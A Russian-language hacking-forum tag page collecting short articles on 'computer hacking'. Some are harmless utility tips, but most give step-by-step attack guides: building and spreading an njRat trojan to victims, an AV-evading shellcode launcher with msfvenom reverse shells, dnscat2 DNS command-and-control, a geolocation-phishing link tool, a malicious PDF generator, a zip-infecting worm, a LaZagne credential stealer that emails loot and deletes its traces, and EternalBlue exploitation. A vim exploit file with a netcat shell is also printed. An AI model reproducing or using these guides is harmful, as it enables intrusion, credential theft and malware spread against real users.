Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'взлом компьютера'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете транслировать экран компьютера на любое устройство. Deskreen — бесплатная программа, которая позволяет превратить любое устройство с дисплеем, Wi-Fi и браузером во второй монитор для компьютера. Вы можете расширить рабочий стол, дублировать его или вывести по одному запущенному приложению на каждый девайс. Изображение передаётся через браузер, так что нужно установить программу только на один компьютер. Для того, чтобы начать транслировать свой экран нужно: Включить программу, подключитесь на компьютере и другом устройстве к одному и тому же Wi-fi. Отсканируйте QR код или введите указанный адрес в браузере вашего устройства. Нажмите "Разрешить", выберите что хотите транслировать и нажмите "Подтвердить". Готово, теперь изображение должно показываться на вашем втором устройстве. Также можно подключить сразу несколько устройств и транслировать разные окна приложений. Поэтому это отличный вариант как для личного пользования, так и для проведения различных мероприятий. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том , как вы можете управлять компьютером без рук. Довольно специфичная задача – управлять компьютером без помощи рук. Тем не менее она может быть иногда нужна. Для этого можно воспользоваться утилитой Viacam. Возможности голосового управления есть во многих операционных системах. Очень часто они не столь полезны. Несколько задач голосовым управлением можно сделать, но до полноценного управления компьютером – очень далеко. Viacam идет немного иным путем. Отслеживая вашу голову и лицо при помощи веб камеры, алгоритмы программы позволят управлять курсором. Управление станет аналогичным, если вы используете мышь. По сути, при помощи программы можно полноценно управлять компьютером. Viacam работает с Windows и Linux. Поэтому можете попробовать данную программу, немного ознакомится с его функционалом и посмотреть, как это все работает. Возможно, что какие-то из предоставленных функций могут быть полезны кому-нибудь из вас и смогут облегчить работу за компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Совсем недавно компания DeepMind представила свой ИИ AplhaCode, который на международной платформе для соревнования кодеров смог попасть в 54% лучших участников. Нейросеть британской компании приняла участие в 10 тестах со средним уровнем сложности и смогла показать достойный результат, при этом, генерируя собственный уникальный код, не основанный на шаблонах. А теперь можно немного выдохнуть: главной сутью теста была демонстрация навыков критического мышления, кодирования, логики и алгоритмизации, а основная часть тестов состояла из задач по подбору выигрышной стратегии в настольных играх и прокладке дороги по заданным условиям. Можно сделать вывод, что писать полноценное ПО нейросеть пока не может, но неизвестно, что нас ждёт в будущем. Паниковать скорее всего не стоит: если ИИ научится писать код для более привычных нам сегодня задач, то в будущем кому-то придётся писать код для этого ИИ, а значит, без работы не останемся. Поэтому если вы собирались начать изучать программирование или вливаться в хакерские сообщества, то не стоит бросать это дело. Вы точно будете полезны. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно защититься от кейлогеров. Если вы случайно скачаете вирус, вместе с ним к вашему компьютеру могут привязаться кейлоггеры. Это такие хитрые программы, которые запоминают нажатия клавиш на клавиатуре. Например, когда вы вводите свой логин и пароль для входа во ВКонтакте или Сбербанк Онлайн и тд. Так кейлоггер незаметно записывает эти данные и получает доступ к вашим банковским счетам и соцсетям Работает это не очень сложно: кейлоггер просто выдаёт себя за устройство, которое принимает все нажатия клавиш. Такие кибератаки очень опасны, ведь у вас могут украсть ваши данные. Ghostpress - Этот сервис поможет обнаружить и избавиться от этих вредителей. Он работает в фоновом режиме и автоматически блокирует все кейлоггеры. Его база настолько обширна, что Ghostpress практически гарантирует защиту от них. Программа имеет как бесплатный, так и платный функционал. Для каждого станет незаменимым инструментом для защиты своего компьютера от кейлогеров различного вида. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Каждому из нас приходилось прибегать к помощи самозагружающихся дисков и USB-флешек. Случился ли сбой основной ОС, или понадобилось воспользоваться чужим ПК, выручит флешка с собственной операционной системой или инсталлятором ОС. Однако, если у тебя есть смартфон, флешка больше не нужна. С задачей загрузки ОС он справится сам. DriveDroid превращает смартфон в самозагружаемую флешку, которая будет запускать на подключенном компьютере любой указанный образ диска, будь то Windows, Linux или еще более экзотическая ОС. Это отличный инструмент для решения проблем, переустановки ОС и возможность всегда иметь под рукой собственную альтернативную ОС. Использовать DriveDroid просто. Он не требует заранее искать и скачивать образы или обладать какими-то техническими знаниями. Все необходимое приложение сделает само, но для начала ему надо пройти инициализацию и определить, совместим ли технически смартфон с функцией загрузки ОС на ПК. Сразу после установки DriveDroid предложит определить техническую возможность и активировать нужный режим работы. Для этого приложению необходимо предоставить права root и подключить смартфон кабелем к компу. Даем права root и подключаем кабель, затем DriveDroid предложит выбрать предпочтительный метод работы. Standard Android работает в большинстве случаев. На последнем этапе надо указать, какой именно тип носителя ты увидел на компе: USB, CD-ROM или никакого. Это легко проверить через проводник. Выбираем метод работы и тип носителя, затем следует перезагрузить комп и попробовать загрузиться со смартфона. Если все прошло гладко, можешь начинать скачивать образы нужных дистрибутивов Linux прямо из приложения (от минималистичного SliTaz размером 35 Мбайт до полноценного Ubuntu). Впоследствии с каждого из них можно будет загрузиться, нажав на имени нужного образа, выбрать тип носителя (USB или CD), подключить смартфон кабелем и перезагрузить комп. Можно загрузить и Windows. Для этого необходимо скачать ISO-образ, положить его на SD-карту смартфона (или во внутреннюю память, если смартфон не поддерживает карточки) и затем выбрать его при добавлении новой ОС в DriveDroid
-
Приветствую, хакеры! Инструмент удаленного администрирования (RAT) – это запрограммированный инструмент, который позволяет удаленному устройству управлять системой, как если бы у него был физический доступ к этой системе. В то время как совместное использование рабочего стола и удаленное администрирование имеют много законных применений, программное обеспечение «RAT» обычно связано с несанкционированной или злонамеренной деятельностью. NjRat – одна из лучших RAT. Это позволяет получить доступ к удаленному компьютеру и легко выполнять любые удаленные задачи. В этом уроке я расскажу вам, как удаленно взломать компьютер с помощью njRat. КАК УДАЛЕННО ВЗЛОМАТЬ КОМПЬЮТЕР С NJRAT? ТРЕБОВАНИЯ: njRat (инструмент удаленного администрирования).Динамический IP / хост.DUC (Клиент Noip.com)Открытый порт.ШАГИ: 1) Загрузите njRat v0.8 как обновленную версию. Вы также можете работать с любой старой версией, если хотите. 2) Зайдите на сайт noip.com и зарегистрируйтесь. После регистрации вы увидите поле, как показано ниже, для ввода имени хоста. Введите любое имя, выберите любой tld из выпадающего меню и нажмите кнопку «Добавить хост». 3) Хорошо. Давайте откроем njRat и начнем строить сервер. Когда вы откроете окно, появится всплывающее окно, как показано на скриншоте ниже. Пожалуйста, введите порт, который хотите использовать. Я бы рекомендовал порт по умолчанию 1605. Введите 1605 и нажмите кнопку ОК. 4) После нажатия Ok нажмите кнопку Build. И заполните все поля, как я сделал на скриншоте. Убедитесь, что вы ввели собственное имя хоста в поле хоста. Введите порт 1605. В имени жертвы вы можете указать любое имя, какое захотите. Размер KeyLogs подходит для 20. Выбирает каталог, в котором вы хотите разместить свой сервер. И дайте ему имя exe. Вы также можете использовать значок, отметив значок. Но пока я не буду им пользоваться. 5) Когда вы нажмете кнопку «Создать», вам будет предложено ввести имя, указать любое имя и нажать «Сохранить». Начнется создание сервера. Вы увидите диалоговое окно успеха. Теперь сервер готов к распространению на другие компьютеры. Вы можете отправить его кому-нибудь через онлайн-файлы или любым физическим способом. Обязательно заархивируйте его перед копированием на любой физический носитель. 6) Теперь нам нужно открыть порты. Это немного сложная часть. Для этого я создал и разместил видеоурок. 7) Загрузите DUC и введите свое имя пользователя и пароль на noip.com. 8) Все готово … Теперь мы в порядке. Когда кто-то откроет созданный нами сервер на своей машине, он окажется у нас в руках и появится в окне njRat. Вы можете выполнять на компьютере жертвы любое действие, какое захотите. Вот и все .. Надеюсь, вы научились удаленно взламывать компьютер с помощью njRat. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Как правило, проблем с передачей файлов между устройствами не возникает, если есть подключение к сети. Но что делать, если Интернет отсутствует? Оказывается, даже в таком случае можно без проблем передать любую фотографию со смартфона на компьютер или наоборот. Для этого даже не потребуется подключать провода, что очень удобно, например, в поездке. На помощь приходит технология Wi-Fi Direct, которая связывает несколько устройств без хот-спотов и маршрутизаторов. Грубо говоря, она работает подобно Bluetooth, однако обеспечивает более высокую скорость передачи данных. Недостаток всего один: на данный момент не получится воспользоваться технологией без приложения. Способ 1 Большинство приложений из Google Play используют Интернет для передачи данных. Однако среди них есть несколько исключений, в частности, SHAREit, Xender и Zapya. Дальнейшие шаги расписаны на примере Xender, но суть не меняется: Скачайте приложение по ссылке выше и откройте его. Тапните на иконку профиля в левом верхнем углу. Выберите в списке пункт, связанный с подключением к компьютеру. Нажмите на вкладку Hot Spot > Create Hotspot. На следующем экране отобразится название и пароль от виртуальной сети. Подключитесь к сети на компьютере. Когда устройства соединятся, откройте на компьютере браузер и введите адрес, который отображается на экране смартфона. Подтвердите действия. Вы получили на компьютере доступ ко всем файлам смартфона.Кстати, если у вас смартфон бренда Xiaomi, скачивать дополнительное приложение нет необходимости. Просто воспользуйтесь Mi Drop. Файловый менеджер от Google называется не слишком креативно — Files by Google. Способ 2 Также можно попробовать приложения Wi-Fi FTP-Server или Ftp Server. Если вы пользуетесь ES File Explorer или Solid Explorer, в них уже имеется необходимый функционал. Выполните следующее: Перейдите на смартфоне в «Настройки» > «Сеть и Интернет» > «Точка доступа и тетерин» > «Точка доступа Wi-Fi». В зависимости от прошивки, версии Android и оболочки названия пунктов могут отличаться. Если вы впервые пользуетесь этой функцией, необходимо назвать точку и придумать пароль. Активируйте точку переключателем. Подключитесь к этой точке на компьютере. Откройте приложение для использования FTP и нажмите кнопку «Начать». Откройте на компьютере файловый менеджер и введите URL сервера из приложения.Теперь с компьютера вы легко можете управлять файлами, хранящимися в памяти смартфона. Конечно, чтобы воспользоваться Wi-Fi Direct, нужно какое-либо из перечисленных выше приложений, а для этого нужен Интернет. Однако можно выполнить установку заранее, чтобы потом не беспокоиться.
-
Приветствую, хакеры! В этой статье разберем метод создания FUD шеллкода под Windows платформу. Для начала, немного теории: FUD - Fully Undetectable - Способ сокрытия потенциально вредоносных функций кода, путем обфускации, для уменьшения/исключения количества случаев определения кода антивирусными решениями, как вредоносного.Shellcode - это двоичный исполняемый код, который обычно передаёт управление командному процессору, например '/bin/sh' в Unix shell, 'command.com' в MS-DOS и 'cmd.exe' в операционных системах Microsoft Windows. Шелл-код может быть использован как полезная нагрузка эксплойта, обеспечивающая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе. Для того, чтобы достичь максимального профита в данном вопросе и в данном конкретном случае мы будем использовать: Charlotte - C++ Fully Undetected Shellcode Launcher Описание: Средство запуска шелл-кода c ++, полностью необнаруженное 0/26 по состоянию на 13 мая 2021 г.Динамический вызов функций api win32XOR-шифрование шелл-кода и имен функцийРандомизированные ключи XOR и переменные за запускТребования для Kali Linux просто «apt-get install mingw-w64 *»Рандомизация длины случайных строк и ключей XORПриступаем к реализации задуманного: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py Такой вывод, должен вас ждать в случае успешного создания dll файла для запуска его на целевом хосте. rundll32 charlotte.dll, STmdDoaQ STmdDoaQ -В данном случае выступает ключом, с которым мы позже запустим dll на целевом хосте. Запускаем обработчик входящих подключений на атакующем хосте: msfconsole use exploit/multi/handler set LHOST {IP} set LPORT {port} Доставляем файл charlotte.dll на целевой хост, и выполняем: rundll32 charlotte.dll, STmdDoaQ В результате, закономерно получаем шелл на целевом хосте: В целом, всё выглядит неплохо, но если на борту у целевого хоста стоит антивирус, нормальный с последними обновлениями то мы получаем срабатывание на meterpreter, так как он не палится только ленивыми. Попробуем немного видоизменить полезную нагрузку: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.101 LPORT=4444 -f raw > beacon.bin Запускаем обработчик: Данный тест проводился на Windows 10 с последними обновлениями и наличием антивирусного решения ESET, и как результат, ESET убил полезную нагрузку. Вывод: Метод и инструмент достаточно хорош, dll файл не распознается как вредоносный ни антивирусом ни Windows DefenderИспользование стандартных полезных нагрузок не сработает, в случае наличия вменяемого антивирусного решения на целевом хостеНужно использовать отличные от предлагаемых стандартных методов сокрытия полезной нагрузки для достижения желаемого результата. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
-
Приветствую, хакеры! Сегодня я бы хотел вам рассказать об утилите dnscat2 dnscat2 - это утилита для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С. C&C (Command and Control) сервер - компьютер, контролируемый атакующим, который отправляет команды на скомпрометированную машину. В чем смысл маскировки трафика под DNS Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен. Накидал для вас примерную схему: Скачивание и установка sudo apt-get updаte sudo аpt-get -y instаll ruby-dev git mаke g++ sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git Установка серверной части: cd dnscat2/server bundle instаll Установка клиентской части: cd dnscat2/client make Если возникли ошибки при установке: iagox86/dnscat2 найдите вашу ошибку здесь. Тут описаны некоторые ошибки. Если вашей ошибки нет, тозагуглите. К делу Запускаем: Сервер: sudo ruby dnscat2.rb Клиент: запускаете на удаленной машине. *Если разрешен доступ только к легитимным DNS серверам: Сервер: sudo ruby dnscat2.rb legitdnsserver.com Клиент: ./build legitdnsserver.com Как только произойдет подключение dnscat2 выведет вам номер сессии.После выбора сессии:sessions -i У вас будет доступен ряд команд:clear delay download echo exec help listen ping quit set shell shutdown suspend tunnels unset upload window windows Проброс туннеля Если вам нужен удобный доступ к машинам в локальной сети по SSH, то это очень полезная вещь. Выбираем сессию и вводим команду:listen : Теперь вы можете спокойно подключиться к той машине, которую не видно из вне через ssh.ssh -P [email protected] Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть. Как обнаружить dnscat2 на своей машине Делаем дамп через wireshark и забиваем следующий фильтр:dns.qry.name.len > 16 and !mdns 16 - просто длина имени DNS домена. Я подбирал вручную, у вас это число может отличаться. Чтобы его подобрать просто смотрите в результат фильтрации. После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat. И в информации о пакете ищем dnscat. Полезные ссылки https://github.com/iagox86/dnscat2 - Страница dnscat, с его документацией. https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 - Про обнаружение DNS туннелей.
-
Приветствую, хакеры! У каждого из нас, скорее всего, бывают вещи и информация, которую мы не хотели бы показывать остальным. Допустим, у Вас есть фотографии, которые Вы бы никому не хотели показывать. При этом, компьютер может быть общим (семейный). Сейчас мы расскажем, как скрыть любой раздел диска и сохранить свои данные в безопасности. Способ первый - через управление дисками Наводим курсор на «Пуск» и нажимаем на «Управлением дисками» 2. Выделяем нужный диск и открываем контекстное меню. Там выбираем раздел «Изменить букву или путь к диску...» 3. Откроется окно. Выделяем выбранный диск и нажимаем на «Удалить» чуть ниже 4. Согласитесь с предупреждением, путем нажатии кнопки «Да» На данном этапе, диск не будет видно. Он как бы есть, но обратиться к нему ни Вам, ни кому-либо другому не выйдет. Восстановление доступа можно совершить совершая действия также, но вместо «Удалить» нужно будет нажать на «Добавить». Способ второй и более сложный - через командную строку Открываем поиск путем нажатия сочетания клавиш Win+Q (Windows 10) и вводим cmd Открываем Командную строку от имени администратора так, как это показано на скриншоте. 3. В открывшейся командной строке вводим diskpart 4. Открываем полный список дисков путем написания команды List Volume 5. Далее Вам необходимо выбрать диск. Сделать это можно написав select Volume X (где Х - это номер нужного Вам диска) 6. Ну и последний шаг на данном этапе. Напишите remove letter X (где X - буква диска, который вы собираетесь скрыть). После этого, в проводнике этого диска видно не будет. На этом всё. Такими не сложными способами Вы можете с лёгкостью скрыть информацию без потери данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
-
Приветствую хакеры! Недавно попалась на глаза интересная программа, пусть немного сыровата, но функционал весьма любопытный. Позволяет особым образом подготовить флешку и заблокировать компьютер, когда флешка будет извлечена, а также разблокировать – при подключении. Требуется .Net Framework 4.0Ссылка на программу: бдымс! Первый запуск программы На этом этапе можем выставить настройки языка интерфейса и принять лицензионное соглашение. Краткие настройки После первого запуска можно открыть краткие настройки (расширенные – в правом верхнем углу окна соответствующая галочка). На этом этапе задаём пароль защиты (с его помощью можно будет разлочить компьютер, если что-то пойдёт не так). Также указываем букву флешки, на которой создаётся файл разблокировки. Ну и последняя галочка – активация сервиса блокировки. Экран блокировки Вытащим флешку после активации программы и увидим следующее окно. Окна ввода пароля по умолчанию нет, появляется при выполнении двойного клика мышью. Если подключить “заряженную” флешку – то система разблокируется. Конечно экран блокировки не очень, но его можно кастомизировать в расширенных настройках. Там же прописать автоматический старт сервиса при запуске ОС. Можно отключить возможность разблокировки паролем или пакетом по сети, оставив только разблокировку по USB. Кроме того заинтересовала опция, когда привязка идёт не просто к ключевому файлику на флешке (который можно скопировать), но и к программному серийному номеру USB Mass Storage девайса. Его конечно тоже можно копирнуть, но требует более сложную подготовку. Тестил в разных вариациях – пару раз приложение крашнулось (видимо пытался поменять настройки при включенной защите, что не рекомендуется). В общем приложение интересное, функционал неплохой, может быть удобен кому-то. Берите на вооружение. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Сегодня поговорим о знакомом скрипте под названием "Seeker", созданный для поиска местоположения человека посредством перехода по ссылке. Также используется ngrok. Seeker использует HTML5, Javascript, JQuery и PHP для захвата информации об устройстве и геолокации с высокой точностью. Точность полученной информации - около 30 метров. На iPhone по какой-то причине точность местоположения составляет около 65 метров. Он размещает поддельный веб-сайт на Apache Server и использует Ngrok , которая запрашивает разрешение на размещение, и если пользователь ее разрешает, то мы получаем следующие данные: Долгота.Широта.Точность.Высота - не всегда доступна.Направление - доступно только в том случае, если пользователь движется.Скорость - доступна только в том случае, если пользователь движется.Наряду с информацией о местоположении мы также можем получить информацию об устройстве без каких-либо разрешений: Операционная система.Платформа.Количество ядер процессора.Объем оперативной памяти - приблизительные результаты.Разрешение экрана.Информация о GPU.Имя и версия браузера.Открытый IP-адресКод: Установка и запуск. git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh Код: Запуск - python seeker.py Жертва переходит по сгенерированной ссылке и разрешает доступ к геолокации, после чего мы видим его местоположение. Сразу можно открыть google map. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры, в этой статье собираюсь показать вам Proof-Of-Concept мини-червя, который добавляет себя во все .zip архивы, заражая их. Начнём. Логика нашего червя такова: Ищем все zip файлы в папкеДобавляем своё отродье в архивПовторяем тоже самое со всеми файлами. (рекурсией)Первым делом необходимо создать новый метод, который будет принимать 2 аргумента - папку для заражения и файл, который будем добавлять в архив: И создаём рекурсивный метод, который будет заражать все подпапки: Переходим к Main'у. Тут создаём две переменные: путь до исполняемого файла, и путь до рабочего стола: string currentFilePath = Assembly.GetExecutingAssembly().Location, desktopPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop); После этого нужно вызвать методы: zipInfect(new DirectoryInfo(desktopPath), currentFilePath); // Заражаем архивы на рабочем столе recursiveInfect(desktopPath, currentFilePath); // И в подпапках: И теперь тестируем: Как видим, в архивах появился наш файлик. На этом все. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные!
-
Привет, хакеры, сейчас разберем один из способов создания винлокера. Узнаем его возможности и функции, увидим код и научимся создавать его. Хочу напомнить читателю, что все находящиеся здесь данные были получены из открытых источников и находится здесь лишь в целях ознакомления, а также не призывает вас к описанным действиям. Создано только для обучения и развлечения. Вся информация сделана для того, чтобы пользователи могли защититься от махинаций мошенников. Все причиненные возможные убытки посетитель берет на себя. Автор проделывает все на своем оборудовании и в собственной сети. Не повторяйте ничего из прочитанного в реальной жизни. Функции: -Блокировать клавиши F4/alt+F4/Fn+F4-Переводим мышку в позицию координат X и Y-Запоминать сессиюНабор невелик, однако его хватит, для углубленного ознакомления с подобными программами и научиться ими пользоваться. В случае интереса данной темы, можете самостоятельно или с чьей-либо помощью наращивать количество функционала. Это даст большой опыт в программировании и позволит лучше защищаться от таких вирусных приложений. Надеюсь, эта статья помогла вам. Напоминаю, что она написана исключительно для проверки своих способностей и мастерства и не призывает к действиям.
-
Привет, хакеры, в данной статье расскажу о способе взлома компьюетра, позволяющий управлять камерой, перезагрузкой и всеми другими компонентами ПК. Установка Termux Способ будет показан через телефон, поэтому необходимо скачать и установить Termux из плей маркета. Устанавливаем все необходимые библиотеки: pkg update pkg install wget Следующим этапом загружаем Metasploit git clone https://github.com/gushmazuko/metasploit_in_termux.git Далее клонируем его и производим запуск cd metasploit_in_termux chmod +x metasploit.sh ./metaslploit.sh Ожидаем установки. После завершения загрузки, будет необходимо ввести букву Y, что будет означать – да. Если у вас достаточно хороший телефон, то проблем с установкой не возникнет. Взлом компьютера Атака на компьютер производится при помощи известного и популярного эксплойта EternalBlue. Однако, необходимо сначала получить собственный ип-адрес. Для этого переходим в термукс и вводим следующую команду: ip addr show Видим всю необходимую информацию для продолжения. После получения собственного ип-адреса, необходимо запустить консоль данной командой: $ msfconsole После ввода видим подобную картину: Когда консоль откроется, можно начать выбор необходимого эксплойта. Прописываем данную команду: use exploit/windows/smb/ms17_010_eternalblue Отлично, эксплойт выбран. Задаем ип-адрес нашей жертвы и прописываем команду: set RHOST IP Далее создаем payload set payload windows/meterpreter/reverse_tcp После задаем собственный ип-адрес, который узнали ранее. set LHOST IP Вводим следующую команду: set LPORT 4444 Отлично, теперь вы получили консоль, которая позволит управлять другим компьютером.